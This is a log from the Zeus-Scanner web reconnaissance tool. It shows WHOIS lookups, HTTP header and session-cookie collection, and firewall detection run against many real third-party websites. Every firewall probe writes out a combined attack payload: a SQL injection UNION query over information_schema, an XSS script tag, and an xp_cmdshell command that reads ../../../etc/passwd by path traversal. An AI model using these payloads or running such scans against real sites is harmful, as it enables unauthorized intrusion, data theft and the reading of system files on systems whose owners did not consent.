2017-11-13 13:06:30,744;zeus-log;INFO;performing WhoIs lookup on given domain 'www.bobavey.com'...
2017-11-13 13:06:31,454;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:31,455;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:31,456;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.bobavey.com-whois.json'...
2017-11-13 13:06:31,456;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:31,456;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:31,457;zeus-log;DEBUG;attempting connection to 'https://vikasmahajan.wordpress.com/2010/07/07/inserting-and-displaying-images-in-mysql-using-php/ AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:31,735;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:31,735;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:31,736;zeus-log;INFO;attempting to get request headers for 'https://vikasmahajan.wordpress.com/2010/07/07/inserting-and-displaying-images-in-mysql-using-php/'...
2017-11-13 13:06:32,633;zeus-log;DEBUG;fetched {'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'Strict-Transport-Security': 'max-age=15552000', 'Vary': 'Accept-Encoding', 'X-ac': '5.dfw _dfw', 'Server': 'nginx', 'Connection': 'keep-alive', 'Link': '<https://wp.me/pXfJ8-M>; rel=shortlink', 'Date': 'Mon, 13 Nov 2017 19:06:32 GMT', 'X-hacker': "If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.", 'Content-Type': 'text/html; charset=UTF-8', 'X-Pingback': 'https://vikasmahajan.wordpress.com/xmlrpc.php'}...
2017-11-13 13:06:32,633;zeus-log;WARNING;provided target has protection against unencrypted connections (force HTTPS connection)...
2017-11-13 13:06:32,634;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/vikasmahajan.wordpress.com-headers.json'...
2017-11-13 13:06:32,634;zeus-log;INFO;performing WhoIs lookup on given domain 'vikasmahajan.wordpress.com'...
2017-11-13 13:06:32,980;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:32,980;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:32,981;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/vikasmahajan.wordpress.com-whois.json'...
2017-11-13 13:06:32,982;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:32,982;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:32,982;zeus-log;DEBUG;attempting connection to 'http://aeroparts.com.au/ocart/index.php?route=product/category&path=71 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:34,110;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:06:34,111;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/aeroparts.com.au-fingerprint.html'...
2017-11-13 13:06:34,111;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:06:34,111;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:34,111;zeus-log;INFO;attempting to get request headers for 'http://aeroparts.com.au/ocart/index.php?route=product/category&path=71'...
2017-11-13 13:06:35,230;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:35,230;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/aeroparts.com.au-cookie.log'...
2017-11-13 13:06:35,231;zeus-log;DEBUG;fetched {'X-Powered-By': 'PHP/5.4.45', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'PHPSESSID=84e09541f4d1b154e0670bcff88daf08; path=/, language=en; expires=Wed, 13-Dec-2017 19:06:34 GMT; path=/; domain=aeroparts.com.au, currency=AUD; expires=Wed, 13-Dec-2017 19:06:34 GMT; path=/; domain=aeroparts.com.au', 'Expires': 'Thu, 19 Nov 1981 08:52:00 GMT', 'Keep-Alive': 'timeout=5, max=100', 'Server': 'Apache', 'Connection': 'Keep-Alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:06:34 GMT', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:06:35,231;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/aeroparts.com.au-headers.json'...
2017-11-13 13:06:35,231;zeus-log;INFO;performing WhoIs lookup on given domain 'aeroparts.com.au'...
2017-11-13 13:06:36,293;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:36,293;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:36,294;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/aeroparts.com.au-whois.json'...
2017-11-13 13:06:36,295;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:36,295;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:36,295;zeus-log;DEBUG;attempting connection to 'http://sanjaybpatel.com/index.php?option=com_content&view=category&id=10&Itemid=122 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:36,525;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:06:36,526;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/sanjaybpatel.com-fingerprint.html'...
2017-11-13 13:06:36,526;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:06:36,526;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:36,527;zeus-log;INFO;attempting to get request headers for 'http://sanjaybpatel.com/index.php?option=com_content&view=category&id=10&Itemid=122'...
2017-11-13 13:06:36,723;zeus-log;DEBUG;fetched {'Content-Length': '337', 'X-Content-Type-Options': 'nosniff', 'Strict-Transport-Security': 'max-age=63072000; includeSubDomains', 'Keep-Alive': 'timeout=5, max=100', 'Server': 'Apache', 'Connection': 'Keep-Alive', 'Date': 'Mon, 13 Nov 2017 19:06:35 GMT', 'X-Frame-Options': 'SAMEORIGIN', 'Content-Type': 'text/html; charset=iso-8859-1'}...
2017-11-13 13:06:36,724;zeus-log;WARNING;provided target has protection against MIME type attacks...
2017-11-13 13:06:36,724;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:06:36,724;zeus-log;WARNING;provided target has protection against unencrypted connections (force HTTPS connection)...
2017-11-13 13:06:36,725;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/sanjaybpatel.com-headers.json'...
2017-11-13 13:06:36,725;zeus-log;INFO;performing WhoIs lookup on given domain 'sanjaybpatel.com'...
2017-11-13 13:06:37,351;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:37,352;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:37,352;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/sanjaybpatel.com-whois.json'...
2017-11-13 13:06:37,353;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:37,353;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:37,353;zeus-log;DEBUG;attempting connection to 'http://link.email.dynect.net/link.php?DynEngagement=true&H=%2Bdu7sJaY23OO%2BqQ6mC2QqglzHYl8onDna9bYv0z8S%2B2c1yLWI1mxfl1zXXxQ%2BHyPNBKMk52TcNxVMlK%2BYmMd6EtMOMM1N29rer6ICvUtEk9q%2BW%2BSEsjQ3g%3D%3D&G=0&R=http%3A%2F%2Fjournals.plos.org%2Fplosone%2Farticle%3Fid%3D10.1371%2Fjournal.pone.0176364&I=20170517190653.000000006abc%40mail6-59-ussnn1&X=MHwxMDQ2NzU4OjU5MWM5ZjQ1MjZjNzhiMmEyMjViYTFkMjs%3D&S=E73sJXig7vf48altopPSTmudcM2LfkHu75pi4hUuMT0 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:37,980;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:37,981;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:37,981;zeus-log;INFO;attempting to get request headers for 'http://link.email.dynect.net/link.php?DynEngagement=true&H=%2Bdu7sJaY23OO%2BqQ6mC2QqglzHYl8onDna9bYv0z8S%2B2c1yLWI1mxfl1zXXxQ%2BHyPNBKMk52TcNxVMlK%2BYmMd6EtMOMM1N29rer6ICvUtEk9q%2BW%2BSEsjQ3g%3D%3D&G=0&R=http%3A%2F%2Fjournals.plos.org%2Fplosone%2Farticle%3Fid%3D10.1371%2Fjournal.pone.0176364&I=20170517190653.000000006abc%40mail6-59-ussnn1&X=MHwxMDQ2NzU4OjU5MWM5ZjQ1MjZjNzhiMmEyMjViYTFkMjs%3D&S=E73sJXig7vf48altopPSTmudcM2LfkHu75pi4hUuMT0'...
2017-11-13 13:06:38,546;zeus-log;DEBUG;fetched {'X-Varnish-beresp-ttl': '900.000', 'Content-Length': '14648', 'X-Varnish-beresp-status': '200', 'X-Varnish-backend-healthy': 'true', 'X-Cache-Hits': '19', 'X-Served-By': 'varnish9-01-ewr.dyndns.com', 'Expires': 'Mon, 13 Nov 2017 19:14:33 GMT', 'Link': '<https://dyn.com/wp-json/>; rel="https://api.w.org/", <https://dyn.com/?p=49467>; rel=shortlink', 'Date': 'Mon, 13 Nov 2017 18:59:33 GMT', 'Accept-Ranges': 'bytes', 'X-Varnish': '240118 1542265', 'X-Cache': 'HIT', 'Age': '424', 'X-Varnish-beresp-grace': '604800.000', 'Server': 'Apache', 'Connection': 'close', 'X-Varnish-error-restart': '', 'Via': '1.1 varnish-v4', 'Content-Encoding': 'gzip', 'Vary': 'Accept-Encoding', 'X-Restarts': '0', 'Cache-Control': 'max-age=900', 'Content-Type': 'text/html; charset=UTF-8'}...
2017-11-13 13:06:38,644;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/link.email.dynect.net-headers.json'...
2017-11-13 13:06:38,644;zeus-log;INFO;performing WhoIs lookup on given domain 'link.email.dynect.net'...
2017-11-13 13:06:39,004;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:39,005;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:39,005;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/link.email.dynect.net-whois.json'...
2017-11-13 13:06:39,006;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:39,006;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:39,006;zeus-log;DEBUG;attempting connection to 'http://paulocasaca.com/index.php?option=com_content&view=section&layout=blog&id=10&Itemid=53 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:39,133;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'ModSecurity: Open Source Web Application Firewall (Trustwave)'...
2017-11-13 13:06:39,134;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:39,134;zeus-log;INFO;attempting to get request headers for 'http://paulocasaca.com/index.php?option=com_content&view=section&layout=blog&id=10&Itemid=53'...
2017-11-13 13:06:40,834;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:40,835;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/paulocasaca.com-cookie.log'...
2017-11-13 13:06:40,835;zeus-log;DEBUG;fetched {'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'Set-Cookie': '1349ebfc57c3bf8c6a39edd9e340c5b4=9325c1f85c1ce33331dd5792e279c7b9; path=/', 'Expires': 'Mon, 1 Jan 2001 00:00:00 GMT', 'Server': 'nginx/1.12.2', 'Last-Modified': 'Mon, 13 Nov 2017 19:06:40 GMT', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:06:40 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:06:40,836;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/paulocasaca.com-headers.json'...
2017-11-13 13:06:40,836;zeus-log;INFO;performing WhoIs lookup on given domain 'paulocasaca.com'...
2017-11-13 13:06:41,451;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:41,451;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:41,452;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/paulocasaca.com-whois.json'...
2017-11-13 13:06:41,452;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:41,452;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:41,453;zeus-log;DEBUG;attempting connection to 'https://ijcai-15.org/index.php/accepted-papers AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:42,298;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:42,299;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:42,299;zeus-log;INFO;attempting to get request headers for 'https://ijcai-15.org/index.php/accepted-papers'...
2017-11-13 13:06:43,128;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:43,130;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/ijcai-15.org-cookie.log'...
2017-11-13 13:06:43,130;zeus-log;DEBUG;fetched {'X-Powered-By': 'PHP/5.6.32', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'b8c1d0ea3c98b74cf225c9c6f9c75329=pa3hhmtd1mkv07evs0v0avsal4; path=/', 'Keep-Alive': 'timeout=5, max=100', 'Server': 'Apache/2.4.29 (cPanel) OpenSSL/1.0.2m mod_bwlimited/1.4', 'Connection': 'Keep-Alive', 'Date': 'Mon, 13 Nov 2017 19:06:45 GMT', 'Content-Type': 'text/html; charset=UTF-8'}...
2017-11-13 13:06:43,131;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/ijcai-15.org-headers.json'...
2017-11-13 13:06:43,132;zeus-log;INFO;performing WhoIs lookup on given domain 'ijcai-15.org'...
2017-11-13 13:06:43,797;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:43,797;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:43,799;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/ijcai-15.org-whois.json'...
2017-11-13 13:06:43,799;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:43,800;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:43,800;zeus-log;DEBUG;attempting connection to 'http://www.sluzba-spacil.cz/index.php?option=com_content&view=article&id=10&Itemid=13 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:44,536;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:06:44,583;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/www.sluzba-spacil.cz-fingerprint.html'...
2017-11-13 13:06:44,588;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:06:44,588;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:44,589;zeus-log;INFO;attempting to get request headers for 'http://www.sluzba-spacil.cz/index.php?option=com_content&view=article&id=10&Itemid=13'...
2017-11-13 13:06:46,348;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:46,349;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.sluzba-spacil.cz-cookie.log'...
2017-11-13 13:06:46,349;zeus-log;DEBUG;fetched {'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'Set-Cookie': '73bbd341982343f97a4e0b923e229624=en-GB; expires=Tue, 13-Nov-2018 19:06:45 GMT; Max-Age=31536000; path=/', 'Vary': 'Accept-Encoding', 'Server': 'nginx', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', 'Date': 'Mon, 13 Nov 2017 19:06:46 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:06:46,350;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.sluzba-spacil.cz-headers.json'...
2017-11-13 13:06:46,351;zeus-log;INFO;performing WhoIs lookup on given domain 'www.sluzba-spacil.cz'...
2017-11-13 13:06:47,024;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:47,024;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:47,026;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.sluzba-spacil.cz-whois.json'...
2017-11-13 13:06:47,026;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:47,026;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:47,026;zeus-log;DEBUG;attempting connection to 'https://stackoverflow.com/questions/13427177/php-get-url-with-parameter AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:47,377;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:47,377;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:47,378;zeus-log;INFO;attempting to get request headers for 'https://stackoverflow.com/questions/13427177/php-get-url-with-parameter'...
2017-11-13 13:06:47,539;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:47,541;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/stackoverflow.com-cookie.log'...
2017-11-13 13:06:47,541;zeus-log;DEBUG;fetched {'Content-Length': '324', 'Via': '1.1 varnish', 'X-Cache': 'MISS', 'X-DNS-Prefetch-Control': 'off', 'Accept-Ranges': 'bytes', 'X-Timer': 'S1510600007.480636,VS0,VE45', 'Vary': 'Fastly-SSL', 'Connection': 'keep-alive', 'X-Served-By': 'cache-dfw18626-DFW', 'X-Cache-Hits': '0', 'Set-Cookie': 'prov=21e23f11-7e40-9025-1853-6d7d84bfe6a9; domain=.stackoverflow.com; expires=Fri, 01-Jan-2055 00:00:00 GMT; path=/; HttpOnly', 'Date': 'Mon, 13 Nov 2017 19:06:47 GMT', 'Content-Type': 'text/html; charset=us-ascii'}...
2017-11-13 13:06:47,542;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/stackoverflow.com-headers.json'...
2017-11-13 13:06:47,543;zeus-log;INFO;performing WhoIs lookup on given domain 'stackoverflow.com'...
2017-11-13 13:06:48,081;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:48,082;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:48,083;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/stackoverflow.com-whois.json'...
2017-11-13 13:06:48,084;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:48,084;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:48,084;zeus-log;DEBUG;attempting connection to 'http://www.mcmc.org.au/index.php?view=weblink&catid=22%3Acouncils&id=10%3Acity-of-whittlesea&option=com_weblinks&Itemid=218 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:48,649;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:06:48,650;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/www.mcmc.org.au-fingerprint.html'...
2017-11-13 13:06:48,650;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:06:48,651;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:48,651;zeus-log;INFO;attempting to get request headers for 'http://www.mcmc.org.au/index.php?view=weblink&catid=22%3Acouncils&id=10%3Acity-of-whittlesea&option=com_weblinks&Itemid=218'...
2017-11-13 13:06:51,742;zeus-log;DEBUG;fetched {'Content-Length': '169011', 'X-XSS-Protection': '1; mode=block', 'X-Content-Type-Options': 'nosniff', 'Strict-Transport-Security': 'max-age=31536000', 'X-Hire-Me': 'danielpgibson@gmail.com', 'Cache-Control': 'private', 'Date': 'Mon, 13 Nov 2017 19:06:36 GMT', 'X-Frame-Options': 'sameorigin', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:06:51,746;zeus-log;WARNING;provided target has protection against MIME type attacks...
2017-11-13 13:06:51,746;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:06:51,746;zeus-log;WARNING;provided target has protection against XSS attacks...
2017-11-13 13:06:51,746;zeus-log;WARNING;provided target has protection against unencrypted connections (force HTTPS connection)...
2017-11-13 13:06:51,747;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.mcmc.org.au-headers.json'...
2017-11-13 13:06:51,747;zeus-log;INFO;performing WhoIs lookup on given domain 'www.mcmc.org.au'...
2017-11-13 13:06:53,225;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:53,226;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:53,228;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.mcmc.org.au-whois.json'...
2017-11-13 13:06:53,228;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:53,229;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:53,229;zeus-log;DEBUG;attempting connection to 'http://www.karst.org/index.php?action=download_resource&id=10&module=resourcesmodule&src=@random4f51b326c35f8 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:54,386;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:54,387;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:54,387;zeus-log;INFO;attempting to get request headers for 'http://www.karst.org/index.php?action=download_resource&id=10&module=resourcesmodule&src=@random4f51b326c35f8'...
2017-11-13 13:06:55,123;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:55,124;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.karst.org-cookie.log'...
2017-11-13 13:06:55,125;zeus-log;DEBUG;fetched {'Content-length': '711366', 'Content-Disposition': 'attachment; filename="1350707591_Indiana_20Bat.pdf"', 'Content-Encoding': '', 'Content-Transfer-Encoding': 'binary', 'Set-Cookie': 'PHPSESSID=d8b0779ed9b9d213cc82f9619089de83; expires=Wed, 21-Feb-2018 19:06:54 GMT; Max-Age=8640000; path=/', 'Expires': 'Mon, 13 Nov 2017 19:06:54 GMT', 'Keep-Alive': 'timeout=5, max=100', 'Server': 'Apache', 'Connection': 'Keep-Alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:06:54 GMT', 'Content-Type': 'application/pdf'}...
2017-11-13 13:06:55,126;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.karst.org-headers.json'...
2017-11-13 13:06:55,126;zeus-log;INFO;performing WhoIs lookup on given domain 'www.karst.org'...
2017-11-13 13:06:55,532;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:55,532;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:55,534;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.karst.org-whois.json'...
2017-11-13 13:06:55,534;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:55,534;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:55,535;zeus-log;DEBUG;attempting connection to 'http://typo3.p269271.webspaceconfig.de/index.php?id=10 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:56,525;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:06:56,526;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:56,526;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:56,527;zeus-log;INFO;attempting to get request headers for 'http://typo3.p269271.webspaceconfig.de/index.php?id=10'...
2017-11-13 13:06:57,142;zeus-log;ERROR;unable to retrieve headers for site 'http://typo3.p269271.webspaceconfig.de/index.php?id=10'...
2017-11-13 13:06:57,156;zeus-log;INFO;performing WhoIs lookup on given domain 'typo3.p269271.webspaceconfig.de'...
2017-11-13 13:06:57,862;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:57,863;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:57,864;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/typo3.p269271.webspaceconfig.de-whois.json'...
2017-11-13 13:06:57,864;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:57,865;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:57,865;zeus-log;DEBUG;attempting connection to 'https://synapse.koreamed.org/DOIx.php?id=10.4040/jkan.2015.45.2.221&vmode=PUBREADER AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:58,826;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:06:58,827;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:58,827;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:58,828;zeus-log;INFO;attempting to get request headers for 'https://synapse.koreamed.org/DOIx.php?id=10.4040/jkan.2015.45.2.221&vmode=PUBREADER'...
2017-11-13 13:06:59,449;zeus-log;ERROR;unable to retrieve headers for site 'https://synapse.koreamed.org/DOIx.php?id=10.4040/jkan.2015.45.2.221&vmode=PUBREADER'...
2017-11-13 13:06:59,450;zeus-log;INFO;performing WhoIs lookup on given domain 'synapse.koreamed.org'...
2017-11-13 13:06:59,861;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:59,862;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:59,863;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/synapse.koreamed.org-whois.json'...
2017-11-13 13:06:59,863;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:59,864;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:59,864;zeus-log;DEBUG;attempting connection to 'http://embracingtheinfinite.com/index.php?option=com_content&view=category&layout=blog&id=10&Itemid=234 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:07,105;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:07,106;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:07,106;zeus-log;INFO;attempting to get request headers for 'http://embracingtheinfinite.com/index.php?option=com_content&view=category&layout=blog&id=10&Itemid=234'...
2017-11-13 13:07:07,671;zeus-log;INFO;found a request cookie, saving to file...
